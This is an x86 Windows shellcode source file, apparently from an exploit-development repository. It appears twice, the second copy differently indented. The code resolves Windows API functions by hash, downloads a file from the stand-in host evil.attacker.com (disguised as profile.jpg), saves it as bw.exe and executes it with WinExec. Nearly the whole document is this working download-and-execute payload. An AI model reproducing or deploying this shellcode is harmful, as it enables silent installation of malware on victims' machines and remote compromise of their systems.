phikshun/drop2.asm

## drop2.asm
[BITS 32]
[ORG 0]

  cld
  mov  esi, esp	  ; ESI points to the current postion of the stack (for ref local var)
  sub  esp, 2000h  ; Alloc some stack space
  call start
delta:
%include "block_api32.asm"
start:
  pop	ebp
  lea	eax, [ebp+szUrlmon-delta]
  push	eax
  push	0x0726774C      ; hash( "kernel32.dll", "LoadLibraryA" )
  call	ebp             ; LoadLibraryA("urlmon.dll");
  mov	dword [esi], eax ; [esi-0] => hModuleUrlmon

  lea	ecx, [ebp+szDownloadToFile-delta]
  push	ecx
  mov	edx, [esi]	; hModuleUrlmon
  push	edx
  push	0x7802F749	; hash( "kernel32.dll", "GetProcAddress" )
  call	ebp		; GetProcAddress(hModuleUrlmon, szDownloadToFile);
  mov	dword [esi-4], eax ; [esi-4] => URLDownloadToFileA

  xor	ecx, ecx
  push	ecx		; lpfnCB
  mov	ebx, 10h
  push	ebx		; dwReserved = BINDF_GETNEWESTVERSION
  lea	edx, [ebp+szFilename-delta] ; szFilename
  push	edx
  lea	edx, [ebp+szDownloadURL-delta] ; szDownloadURL
  push	edx
  push	ecx		; pCaller
  call 	dword [esi-4]	; URLDownloadToFileA ( LPUNKNOWN pCaller, LPCTSTR szDownloadURL,
					     ; LPCTSTR szFileName, DWORD dwReserved,
  					     ; LPBINDSTATUSCALLBACK lpfnCB );

  mov	ecx, 1	        ; ecx = 1
  push 	ecx		; uCmdShow = SW_SHOWNORMAL
  lea	edx, [ebp+szFilename-delta] ; lpCmdLine
  push	edx
  push	0x876F8B31	; hash( "kernel32.dll", "WinExec" )
  call	ebp		; WinExec( LPCSTR lpCmdLine, UINT uCmdShow);

  push	0x56A2B5F0	; hash( "kernel32.dll", "ExitProcess" )
  call	ebp
szUrlmon:
  db "urlmon.dll", 0
szDownloadToFile:
  db "URLDownloadToFileA", 0
szFilename:
  db "bw.exe", 0
szDownloadURL:
  db "http://evil.attacker.com/profile.jpg", 0
  times 64 db 0
	[BITS 32]
	[ORG 0]

	cld
	mov esi, esp ; ESI points to the current postion of the stack (for ref local var)
	sub esp, 2000h ; Alloc some stack space
	call start
	delta:
	%include "block_api32.asm"
	start:
	pop ebp
	lea eax, [ebp+szUrlmon-delta]
	push eax
	push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
	call ebp ; LoadLibraryA("urlmon.dll");
	mov dword [esi], eax ; [esi-0] => hModuleUrlmon

	lea ecx, [ebp+szDownloadToFile-delta]
	push ecx
	mov edx, [esi] ; hModuleUrlmon
	push edx
	push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
	call ebp ; GetProcAddress(hModuleUrlmon, szDownloadToFile);
	mov dword [esi-4], eax ; [esi-4] => URLDownloadToFileA

	xor ecx, ecx
	push ecx ; lpfnCB
	mov ebx, 10h
	push ebx ; dwReserved = BINDF_GETNEWESTVERSION
	lea edx, [ebp+szFilename-delta] ; szFilename
	push edx
	lea edx, [ebp+szDownloadURL-delta] ; szDownloadURL
	push edx
	push ecx ; pCaller
	call dword [esi-4] ; URLDownloadToFileA ( LPUNKNOWN pCaller, LPCTSTR szDownloadURL,
	; LPCTSTR szFileName, DWORD dwReserved,
	; LPBINDSTATUSCALLBACK lpfnCB );

	mov ecx, 1 ; ecx = 1
	push ecx ; uCmdShow = SW_SHOWNORMAL
	lea edx, [ebp+szFilename-delta] ; lpCmdLine
	push edx
	push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
	call ebp ; WinExec( LPCSTR lpCmdLine, UINT uCmdShow);

	push 0x56A2B5F0 ; hash( "kernel32.dll", "ExitProcess" )
	call ebp
	szUrlmon:
	db "urlmon.dll", 0
	szDownloadToFile:
	db "URLDownloadToFileA", 0
	szFilename:
	db "bw.exe", 0
	szDownloadURL:
	db "http://evil.attacker.com/profile.jpg", 0
	times 64 db 0